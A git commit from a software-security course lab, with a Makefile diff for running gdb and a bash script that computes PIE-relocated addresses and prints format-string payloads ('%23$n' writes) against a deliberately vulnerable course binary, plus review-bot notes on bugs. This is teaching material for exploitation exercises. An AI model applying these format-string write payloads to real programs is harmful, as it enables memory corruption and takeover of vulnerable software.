Finish TD6

This commit is contained in:
Yorick Barbanneau 2023-04-12 23:35:55 +02:00
parent 07eb566445
commit 7c934bcefb
3 changed files with 236 additions and 29 deletions


@ -4,7 +4,7 @@ SRC = $(wildcard *.c)
TGT = $(subst .c,,$(SRC))
BUILD_DIR = build
DUMP_DIR = dump
SETARCH ?= 0
pframe:
curl -o pframe.tgz https://dept-info.labri.fr/~thibault/SecuLog/pframe.tgz && \
@ -36,9 +36,16 @@ build: $(addprefix $(BUILD_DIR)/, $(addsuffix _32, $(TGT))) \
$(addprefix $(BUILD_DIR)/, $(addsuffix _64-pie, $(TGT))) \
PHONY: gdb_% configure
gdb_%: $(addprefix $(BUILD_DIR)/, $(subst gdb_,,%))
PYTHONPATH=${PWD}/pframe${PYTHONPATH:+:${PYTHONPATH}} setarch -R gdb $< --command=$(subst gdb_,,$@).gdb
ifeq ($(SETARCH),1)
gdb_command = setarch -R gdb
else
gdb_command = gdb
endif
PHONY: gdb_%
gdb_%: configure $(addprefix $(BUILD_DIR)/, $(subst gdb_,,%))
PYTHONPATH=${PWD}/pframe${PYTHONPATH:+:${PYTHONPATH}} $(gdb_command) \
$(addprefix $(BUILD_DIR)/, $(subst gdb_,,$@)) \
--command=$(subst gdb_,,$@).gdb
PHONY: clean
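Review bot: On the new `PYTHONPATH=` recipe line, `${PYTHONPATH:+:${PYTHONPATH}}` is expanded by Make before the shell ever sees it — Make reads it as a reference to a (nonexistent) variable named `PYTHONPATH:+:…` and substitutes nothing, so a pre-existing PYTHONPATH is dropped instead of appended; the shell form needs escaped dollars, `PYTHONPATH=$(CURDIR)/pframe$${PYTHONPATH:+:$${PYTHONPATH}} $(gdb_command) \`. Separately, `PHONY: gdb_%` and `PHONY: clean` lack the leading dot, so each defines an ordinary target named `PHONY` rather than marking anything phony; `.PHONY: clean` is the intended form, and as far as I know `.PHONY` takes literal names only, so the `gdb_%` line can simply be dropped (no file named `gdb_<x>` ever exists, so that pattern target is rebuilt every run regardless). The `build:` rule this hunk starts in and the `clean` rule it ends on continue outside the hunk.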


@ -0,0 +1,108 @@
#!/bin/bash
#
#
usage() {
cat <<EOF
hack the vulnerable!
This script calculate for you all you need to hack the \`vulnerable-1_32-pie\`
TD6 part1 question 9 of software security course
OPTIONS
-h | --help show this message
-a | --address set the \`foo()\` return address if not set, script will
ask you to put it on stdin
-i | --show-info display all informations abous processing addresses
EOF
}
error() {
>&2 printf "\e[31mError\e[0m: %s\n" "$1"
}
info() {
local message="$*"
[[ -z $DEBUG || $DEBUG -ne 1 ]] && return
[ -z "$message" ] && return
# On affiche les informations supplémentaires pour le débogage
printf "\n\e[34mInfo\e[0m: %s\n" "$message"
}
process_args() {
while :; do
case $1 in
-h|-\?|--help)
usage
exit 0
;;
-a|--address)
addr="$2"
shift
;;
-i|--show-information)
DEBUG=1
;;
*)
break
esac
shift
done
}
process_args "$@"
if [ -z "${addr:-}" ]
then
printf "Enter the return address for foo(): "
read -r addr
else
info "I have the address: $addr"
fi
if [[ $addr =~ ^0x.*$ ]]
then
addr=${addr:2:8}
info "remove 0x on address begining $addr"
fi
if [[ ! $addr =~ ^[0-9a-fA-F]{8}$ ]]
then
error "$addr is not a valid address"
exit 10
fi
for e in "main" "target"
do
v=$(objdump -D build/vulnerable-1_32-pie | grep "<$e>" | awk '{print $1}')
printf -v "$e" "%s" "$v"
done
info "Get main() and target address with objdump
* main: $main
* target: $target"
delta=$((16#$target - 16#$main))
info "Caclulate the difference between this two address:
* delta: $delta"
pie_main=${addr:0:6}${main:6:4}
info "get the main() address on our executable : get the 3 fist numbers of addr
and the last one of the main address reported by \`objdump\`
* main() address on pie process: $pie_main"
printf -v pie_target "%x" $((16#$pie_main + delta ))
info "Add the delta to main() address
* \`target\` address on pie process: $pie_target"
printf -v get_target "\\\\\\\x%s" "${pie_target:6:2}" "${pie_target:4:2}" "${pie_target:2:2}" "${pie_target:0:2}"
info "Put the target address in the right order:
* address payload: $get_target"
printf "\nGet the Target :\n"
printf "%s %s\n" "$get_target" "%23\$s"
printf "\nModify the Target:\n"
printf "%s %s\n" "$get_target" "%23\$s"
printf "\nHack the Target:\n"
printf "%s%s\n" "$get_target" "%152896p%23\$n"
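Review bot: The option parser accepts `-i|--show-information` while the usage text documents `-i | --show-info`, so the long flag a user copies from `--help` falls into the `*)` branch and is silently ignored; make the case label `-i|--show-info|--show-information)` (or correct the usage text) so the two agree. The symbol lookup `grep "<$e>"` over the `objdump -D` output will presumably also match any instruction line that references the symbol, leaving `$main`/`$target` multi-line and breaking the `16#` arithmetic; anchoring on the definition line, `grep "<$e>:"`, selects only the symbol header. The binary path `build/vulnerable-1_32-pie` is relative to the caller's working directory rather than the script's location, which is worth stating in `usage` or resolving against `$(dirname "$0")`. An unrecognised option beginning with `-` currently falls through to `break` rather than calling `error`, which hides typos.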